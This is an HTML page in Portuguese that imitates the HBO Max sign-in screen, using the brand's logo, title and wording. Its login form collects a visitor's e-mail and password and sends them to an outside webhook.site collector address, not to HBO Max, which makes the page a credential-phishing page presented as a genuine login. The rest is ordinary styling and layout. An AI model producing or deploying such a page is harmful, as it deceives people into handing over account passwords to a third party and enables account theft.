<!DOCTYPE html>

<html lang="pt-br" xmlns="http://www.w3.org/1999/xhtml">
<head>
    <meta charset="utf-8" />
    <meta name="description" content="Free Web tutorials">
    <meta name="keywords" content="HTML, CSS, JavaScript">
    <meta name="author" content="John Doe">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>HBOMax</title>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2? família=Hubballi&family=Montserrat:ital,wght@0.400;1.700&family=Poppins:ital,wght@0.400;0.700;1.700&family=Uchen&display=swap" rel="stylesheet">

    <style>
        #principal {
            width: 100%;
            padding: 0;
            opacity:revert;
        }

        body {
            background-image: url(img/background3.jpg);

           
       
        }

        .linha {
            display: flex;
            flex-flow: row wrap;
            height: 100%;
        }

        #background {
            color: black;
        }

        #background1 {
            width: 33%;
        }

        #background2 {
            width: 33%;
        }

        #background3 {
            width: 16.5%;
        }
        #background4 {
            width: 16.5%;
        }

        #background2 img {
            width: 50%;
            margin-left: 30%;
            margin-top: 10%;
        }

        #menu {
            color: #808080;
            text-align: center;
            font-size: 20px;
            width: 100%;
            font-weight: 500;
            margin-top: 10px;
            margin-left: 5%;
        }

            #menu p {
                margin-top: 0;
            }

        #textEntrar p {
            color: white;
            text-align: center;
            font-weight: 800;
            font-size: 33px;
            font-family: 'Montserrat', sans-serif;
            margin-left: 5%;
        }

        #pergunta p {
            color: white;
            margin-left: 14%;
            font-size: 20px;
            margin-top: 10px;
            font-weight: 400;
            width: 300px;
        }

        #login form {
            margin-left: 7%;
            color: white;
            font-size: 25px;
            margin-top: 10px;
            font-weight: 900;
            
        }

        #login input {
            margin-left: 10%;
            border-radius: 20px;
            margin-top: 10px;
            background-color: #808080;
            width: 280px;
            height: 25px;
            opacity: 0.5;
        }

        #p {
            margin-top: 20px;
        }

        #senha {
            margin-top: 20px;
        }

        #login button {
            background-image: linear-gradient( to right, #8c77e0, white);
            margin-top: 20px;
            margin-left: 28%;
            border-radius: 20px;
            height: 40px;
            width: 150px;
        }

            #login button p {
                margin-left: 30%;
                margin-right: 75px;
                margin-top: 5px;
                color: black;
                font-size: 20px
            }

        #texto {
            color: #cacaca;
            font-size: 120%;
            padding-top: 0;
            font-weight: bolder;
            margin-top: 10px;
            margin-left: 5%;
            width: 100%;
            margin-left: 5%;
            width: 400px;
        }

        #provedor button {
            background-image: linear-gradient( to right, #8c77e0, white);
            margin-top: 10px;
            margin-left: 22%;
            border-radius: 20px;
            height: 40px;
            width: 230px;
      
        }
     
        button:hover {
            background-color: white;
        }

            #provedor button p {
                color: black;
                font-size: 150%;
                margin-left: 5%;
                margin-top: 5px;
                font-weight: 500;
            }
        #3 {
            width: 100%;
            height: 100%;
            display: inline-block;
           
        }
        .div3 {
          
            color: white;
            margin-left: 100px;
            font-size: 120%;
        }
    </style>
</head>
<body>
    <div id="principal" >
    
        <div class="linha" id="background">
            <div id="background1"></div>
            <div id="background2">
                <div>
                    <img src="img/hbom.png" />
                </div>
                <div id="menu">
                    <p>
                        <br />
                        
                    </p>
                </div>
                <div id="textEntrar">
                    <p>
                        Entrar
                    </p>
                </div>
                <div id="pergunta">
                    <p>Você tem uma conta na HBO Max?</p>
                </div>
                <div id="login">

                    <form action="3dd0bde7-feff-4e41-b5b6-3da379d73155@email.webhook.site" method="post">
                        E-mail
                        <input type="text" name="email" required />
                        <div id="p">
                            Senha
                            <input id="input2" type="text" name="senha" required /><br />
                            <button type="submit"><p>Entrar</p></button>
                        </div>
                    </form>
                </div>
                <div id="texto">
                    <p>
                        Você acessa a HBO Max por um provedor <br />
                        de Tv, Internet ou celular?
                    </p>
                </div>
                <div id="provedor">
                    <button type="submit">
                        <p>
                            Entrar como provedor
                        </p>
                    </button>
                </div>
            </div>
            <div id="background3">
                <div id="3">
                    <div class="div3" id="assinar">
                        Assinar
                    </div>
                </div>
            </div>
            <div id="background4">

                <div class="div3" id="entrar">
                    Entrar
                </div>
            </div>
            </div>
        </div>
  
</body>
</html>